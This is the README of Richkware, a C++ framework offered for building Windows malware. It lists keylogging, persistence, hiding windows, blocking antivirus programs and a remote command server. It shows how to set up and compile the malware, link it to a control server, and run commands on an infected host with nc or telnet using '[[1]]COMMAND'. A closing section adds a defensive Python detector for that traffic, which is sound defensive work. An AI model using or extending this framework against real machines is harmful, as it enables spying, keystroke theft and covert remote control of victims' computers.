richkmeli / Richkware

Licence: apache-2.0
Framework for building Windows malware, written in C++

Richkware

Framework for building Windows malware, written in C++.

Description

Richkware is a library of network and OS functions that you can use to create malware. Combining these functions lets an application take on behaviors characteristic of the following types of malware:

  • Virus
  • Worms
  • Bot
  • Spyware
  • Keylogger
  • Scareware

Related Projects

Richkware-Manager-Server: service for managing hosts that run an instance of malware developed with the Richkware framework.

Richkware-Manager-Client: client of Richkware-Manager-Server; it obtains the list of all hosts from the server and can send any kind of command to them.

Documentation

  • Presentation: PDF (EN), PDF (IT)
  • Report: PDF (EN), PDF (IT)

Functions

Network

  • Server (network.h): module that manages a multi-threaded server, which receives commands from the Internet (Richkware-Manager-Client or console) according to the specific protocol.
    • Protocol (protocol.h):
      1. Remote command execution (ID 1)
      2. (work in progress)
  • Network (network.h):
    • RawRequest: send a request to a server;
    • UploadInfoToRichkwareManagerServer: send information to Richkware-Manager-Server

System

  • Storage (storage.h):

    • SaveSession and LoadSession: save the application state (encrypted) to:
      • Registry (SaveValueReg and LoadValueReg)
      • File (SaveValueToFile and LoadValueFromFile)
    • Persistence: install itself permanently in the system.
  • IsAdmin and RequestAdminPrivileges (richkware.h): check for and request administrator privileges;

  • StealthWindow (richkware.h): hide applications;

  • OpenApp (richkware.h): open arbitrary applications;

  • Keylogger (richkware.h): stores in a file all pressed keys;

  • BlockApps and UnBlockApps (blockApps.h): block and unblock applications (antivirus, ...).

Cryptography

  • Encrypt and Decrypt (crypto.h): RC4 (default), Blowfish.
  • Encode and Decode (crypto.h): Base64 (default), Hex.

Other

  • RandMouse (richkware.h): randomly move the mouse cursor;
  • Hibernation (richkware.h): hibernate system.

Requirements

These are the base requirements to build and use Richkware:

Get Started

Open main.cpp, and create an instance of Richkware.

With Richkware-Manager-Server

If you have deployed RMS, you can initialize the malware as follows:

    int main() {
        Richkware richkware("Richk", "DefaultPassword", "192.168.99.100", "8080", "associatedUser");
        ...
        return 0;
    }

In this case, it gets a secure key from Richkware-Manager-Server and sets it as the encryption key. DefaultPass (the second constructor argument, "DefaultPassword" in the example above) is used as a temporary encryption key to ensure secure communication with RMS; if the malware cannot reach the RMS to get its encryption key, it uses DefaultPass as the encryption key.

Without Richkware-Manager-Server

Otherwise, if you haven't deployed RMS, you can use:

    Richkware richkware("Richk", "richktest");

This way, it uses "richktest" as the encryption key.

Compile

After implementing main.cpp, you can compile as follows.

Using MinGW for Windows or MinGW cross compiler for Linux build environment

make

Using Microsoft C++ compiler (Visual Studio)

  • C/C++ > Preprocessor > Preprocessor Definitions, add "_CRT_SECURE_NO_WARNINGS"
  • Linker > Input > Additional Dependencies, add "Ws2_32.lib"

Examples of usage

In the following example, "server" refers to malware developed with the Richkware framework in which the function for creating a server has been enabled, and "client" refers to the creator (hacker) of the malware, who is trying to establish a connection with the infected PC.

Server-side

Remotely Command Execution

Call the framework function StartServer in main; it starts the server on a port, which in the following example is TCP port 8000. Remember that if a port is already in use by another program, you cannot use that port until that program is stopped.

    int main() {
        ...
        richkware.network.server.Start("8000");
        ...
    }

Client-side

Connect using Richkware-Manager-Client

On any system where the Java Virtual Machine is installed, you can use Richkware-Manager-Client; otherwise, you can simply use a terminal.

Connect using terminal in Unix systems

In Unix systems, you can use netcat, and run the following command:

nc <serverName> 8000

If the server receives the request on the open port and succeeds in creating a connection, it responds to the client confirming that the connection is established. After that, you can write:

[[1]]COMMAND

where COMMAND is a command that has to be executed on the infected host where the server is running.

Connect using terminal in Windows

In Windows, you can use telnet, in the same way:

telnet <serverName> 8000

...

[[1]]COMMAND
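
For defenders, the `[[1]]COMMAND` line framing shown above is a usable network indicator. The following is an added detection example, not code from Richkware or its author: it scans reassembled client-to-server TCP payloads for lines that start with the `[[ID]]` frame and also reports IDs the page does not document. It assumes the frame appears on the wire exactly as typed into netcat or telnet; the function names, addresses and sample streams are constructed for illustration.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Framing from the page: "[[<ID>]]<payload>", one request per line.
FRAME_RE = re.compile(rb"^\[\[(\d{1,4})\]\](.*)$")
KNOWN_IDS = {1: "remote command execution"}  # the only ID the page documents

@dataclass
class Finding:
    src: str
    dst: str
    protocol_id: int
    meaning: str
    command: str

def parse_frame(line: bytes) -> Optional[Tuple[int, bytes]]:
    """Return (protocol_id, payload) when a line starts with the [[ID]] frame."""
    m = FRAME_RE.match(line.rstrip(b"\r\n"))
    return (int(m.group(1)), m.group(2)) if m else None

def scan_stream(src: str, dst: str, data: bytes) -> List[Finding]:
    """Scan one reassembled client-to-server TCP payload, line by line."""
    findings = []
    for line in data.splitlines():  # handles both nc (\n) and telnet (\r\n)
        frame = parse_frame(line)
        if frame is None:
            continue
        pid, payload = frame
        meaning = KNOWN_IDS.get(pid, "undocumented protocol ID")
        findings.append(Finding(src, dst, pid, meaning,
                                payload.decode("utf-8", errors="replace")))
    return findings

# Constructed sample streams (addresses and commands are made up for the demo).
SAMPLE_STREAMS = [
    ("10.0.0.5:51544", "10.0.0.23:8000", b"[[1]]hostname\r\n[[1]]dir C:\\Users\r\n"),
    ("10.0.0.7:40112", "10.0.0.40:8000", b"GET / HTTP/1.1\r\nHost: intranet\r\n\r\n"),
    ("10.0.0.9:40990", "10.0.0.23:8000", b"[[7]]\n"),
    ("10.0.0.9:41002", "10.0.0.41:9000", b"matrix[[1]][0] = 2\n"),  # frame not at line start
]

def scan_all(streams=SAMPLE_STREAMS) -> List[Finding]:
    return [f for src, dst, data in streams for f in scan_stream(src, dst, data)]

if __name__ == "__main__":
    for f in scan_all():
        print(f"ALERT {f.src} -> {f.dst} id={f.protocol_id} ({f.meaning}) cmd={f.command!r}")
```

The match is anchored to the start of a line and does not depend on the port, since 8000 is only the value used in the page's example.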